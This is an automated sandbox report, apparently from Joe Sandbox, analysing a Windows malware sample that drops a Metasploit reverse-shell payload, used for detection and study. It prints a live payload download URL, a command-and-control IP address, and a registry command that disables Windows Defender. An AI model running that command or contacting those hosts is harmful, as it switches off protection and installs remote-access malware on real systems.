                                  Source: WO.exeReversingLabs: Detection: 57%
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                  Machine Learning detection for dropped file
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeJoe Sandbox ML: detected
                                  Machine Learning detection for sample
                                  Source: WO.exeJoe Sandbox ML: detected
                                  Source: unknownHTTPS traffic detected: 185.151.51.214:443 -> 192.168.2.4:49730 version: TLS 1.2
                                  Source: Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: reddit.exe.5.dr
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Local\Temp\4782.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\AppData\Jump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeFile opened: C:\Users\user\Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 4x nop then mov cl, 90h6_2_00404823
                                  Source: global trafficTCP traffic: 192.168.2.4:49731 -> 147.185.221.23:1121
                                  Source: global trafficHTTP traffic detected: GET /file/~d35Ci~adCQqRGWGduhs.exe HTTP/1.1Host: f.neko.peConnection: Keep-Alive
                                  Source: Joe Sandbox ViewIP Address: 147.185.221.23 147.185.221.23
                                  Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
                                  Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                  Source: Network trafficSuricata IDS: 2820208 - Severity 1 - ETPRO MALWARE Possible Metasploit Payload (AB Template PDB) : 185.151.51.214:443 -> 192.168.2.4:49730
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: unknownTCP traffic detected without corresponding DNS query: 147.185.221.23
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeCode function: 6_2_00690095 WSASocketA,connect,recv,closesocket,6_2_00690095
                                  Source: global trafficHTTP traffic detected: GET /file/~d35Ci~adCQqRGWGduhs.exe HTTP/1.1Host: f.neko.peConnection: Keep-Alive
                                  Source: global trafficDNS traffic detected: DNS query: f.neko.pe
                                  Source: reddit.exe.5.drString found in binary or memory: http://www.apache.org/
                                  Source: reddit.exe, 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 0000001B.00000000.1807381222.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 0000001C.00000002.2895738528.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 00000035.00000000.2341086873.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe.5.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                  Source: reddit.exe.5.drString found in binary or memory: http://www.zeustech.net/
                                  Source: WO.exeString found in binary or memory: https://f.neko.pe/file/~d35Ci~adCQqRGW
                                  Source: WO.exe, WO.exe, 00000030.00000003.2342762090.0000000002396000.00000004.00000020.00020000.00000000.sdmp, WO.exe, 00000030.00000003.2342850075.0000000002190000.00000004.00000020.00020000.00000000.sdmp, WO.exe, 00000030.00000003.2342762090.0000000002390000.00000004.00000020.00020000.00000000.sdmp, 4784.bat.0.dr, 481C.bat.48.dr, 703A.bat.18.dr, 6F7F.bat.17.drString found in binary or memory: https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                  Source: unknownHTTPS traffic detected: 185.151.51.214:443 -> 192.168.2.4:49730 version: TLS 1.2

                                  System Summary

                                  barindex
                                  Malicious sample detected (through community Yara rule)
                                  Source: sslproxydump.pcap, type: PCAPMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 53.0.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 28.2.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 53.2.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 6.0.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 27.0.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 6.2.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 27.2.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 28.0.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exe, type: DROPPEDMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
                                  Powershell drops PE file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\reddit.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_00000001400130210_2_0000000140013021
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_00000001400135070_2_0000000140013507
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_00000001400102100_2_0000000140010210
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_00000001400152200_2_0000000140015220
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_000000014000EA480_2_000000014000EA48
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_0000000140014E800_2_0000000140014E80
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_0000000140014E900_2_0000000140014E90
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_0000000140012E970_2_0000000140012E97
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_0000000140015F300_2_0000000140015F30
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_000000014000B7580_2_000000014000B758
                                  Source: C:\Users\user\Desktop\WO.exeCode function: 0_2_00000001400137980_2_0000000140013798
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_000000014001302117_2_0000000140013021
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_000000014001350717_2_0000000140013507
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_000000014001021017_2_0000000140010210
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_000000014001522017_2_0000000140015220
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_000000014000EA4817_2_000000014000EA48
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_0000000140014E8017_2_0000000140014E80
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_0000000140014E9017_2_0000000140014E90
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_0000000140012E9717_2_0000000140012E97
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_0000000140015F3017_2_0000000140015F30
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_000000014000B75817_2_000000014000B758
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 17_2_000000014001379817_2_0000000140013798
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_000000014001302118_2_0000000140013021
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_000000014001350718_2_0000000140013507
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_000000014001021018_2_0000000140010210
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_000000014001522018_2_0000000140015220
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_000000014000EA4818_2_000000014000EA48
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_0000000140014E8018_2_0000000140014E80
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_0000000140014E9018_2_0000000140014E90
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_0000000140012E9718_2_0000000140012E97
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_0000000140015F3018_2_0000000140015F30
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_000000014000B75818_2_000000014000B758
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 18_2_000000014001379818_2_0000000140013798
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_000000014001302148_2_0000000140013021
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_000000014001350748_2_0000000140013507
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_000000014001021048_2_0000000140010210
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_000000014001522048_2_0000000140015220
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_000000014000EA4848_2_000000014000EA48
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_0000000140014E8048_2_0000000140014E80
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_0000000140014E9048_2_0000000140014E90
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_0000000140012E9748_2_0000000140012E97
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_0000000140015F3048_2_0000000140015F30
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_000000014000B75848_2_000000014000B758
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: 48_2_000000014001379848_2_0000000140013798
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeCode function: String function: 000000014001F8E8 appears 33 times
                                  Source: WO.exe, 00000000.00000002.1738273571.00000000004AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Ex vs WO.exe
                                  Source: WO.exe, 00000011.00000002.1814326475.000000000044A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs WO.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                  Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 53.0.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 28.2.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 53.2.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 6.0.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 27.0.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 6.2.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 27.2.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 28.0.reddit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
